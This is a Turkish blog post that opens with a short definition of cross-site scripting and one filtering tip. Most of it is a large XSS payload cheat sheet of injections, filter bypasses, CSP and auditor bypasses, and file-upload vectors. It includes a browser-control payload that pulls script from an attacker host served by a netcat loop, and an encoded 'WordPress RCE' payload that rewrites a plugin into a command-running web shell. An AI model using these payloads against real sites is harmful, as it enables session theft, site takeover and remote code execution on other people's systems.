XSS Tanımı ve XSS Attack Methodları

XSS NEDİR?

XSS (Cross Site Scripting) script kodları üzerinden (genelde javascript) bir web sayfasına saldırı yapılmasıdır.

XSS çoğunlukla tarayıcıda saklanan bilgiler olan cookielere saldırı amacı ile kullanılmaktadır.

Örnek bir XSS saldırı kodu aşağıdadır. Bu kodda bir arama sayfasında html filtrelemesi yapılmazsa olabilecekler öngörülmüştür.

<a href=”ornek.com/arama.php?deger=<script>alert(“XSS TEST!”)</script>”>XSS testi için tıklayınız</a>

XSS testi için tıklayınız yazısına tıklandığında sanki arama textine <script>alert(“XSS TEST!”)</script> yazısı yazılması sağlanmaktadır. Eğer sitede XSS açığı varsa ekranda javascript alerti ile XSS TEST! Yazar.

XSS ataklarından korunmak için ne yapmalıyız?

XSS ataklarından korunmak için yapılacak en basit önlem açık olan kısımda filtreleme uygulamaktır. Php dilini ele alırsak strip_tags fonksiyonu kullanılarak javascript ve html etiketleri filtrelenebilir.

XSS Exploitleri ve Saldırıları için temel ve gelişmiş saldırılar?

 

Teknik Vector/Payload *
* In URLs: & => %26 , # => %23 , + => %2B
HTML Context
Tag Injection
<svg onload=alert(1)>
“><svg onload=alert(1)//
HTML Context
Inline Injection
“onmouseover=alert(1)//
“autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
‘-alert(1)-‘
‘-alert(1)//
Javascript Context
Code Injection
(escaping the escape)
\’-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
Parantezler olmadan <svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
Filtreyi Atla
Uyarı Gizleme
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
Body Tag <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers <x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
Code Reuse
Inline Script
<script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1Doubling
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1=’1’onxxx=1
<x 1=”1″onxxx=1
<[S]x onx[S]xx=1

[S] = stripped char or string

<x </onxxx=1
<x 1=”>” onxxx=1
<http://onxxx%3D1/
Generic Source Breaking <x onxxx=alert(1) 1=’
Browser Control <svg onload=setInterval(function(){with(document)body.
appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input Single Input (script-based)
‘onload=alert(1)><svg/1=’ ‘>alert(1)</script><script/1=’
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)”>’onload=”/*<svg/1=’
`-alert(1)”>’onload=”`<svg/1=’
*/</script>’>alert(1)/*<script/1=’
Multi Input
Double Input Triple Input
p=<svg/1=’&q=’onload=alert(1)> p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
Without Event Handlers <script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS <iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload Injection in Filename
“><img src=1 onerror=alert(1)>.gifInjection in Metadata
$ exiftool -Artist='”><img src=1 onerror=alert(1)>’ FILENAME.jpeg

Injection with SVG File
<svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.domain)”/>

Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Google Chrome
Auditor Bypass
(up to v51)
<script src=”data:&comma;alert(1)//
“><script src=data:&comma;alert(1)//<script src=”//brutelogic.com.br&sol;1.js&num;
“><script src=//brutelogic.com.br&sol;1.js&num;

<link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
“><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

PHP File for
XHR Remote Call
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC <base href=//0>

$ while:; do echo “alert(1)” | nc -lp80; done

Portable WordPress RCE <script/src=”data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

Son Konular

Bigstar Yazar:

Bir Bilişimci'den daha fazlası... WebDeveloper, WebMaster, WebDesigner,Grafiker, WebSecurity, Defansive and Ofansive Hacking Conference Code,Pentests, Rootkits, Malware, Exploits, Redteaming, Offsec....

İlk Yorumu Siz Yapın

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir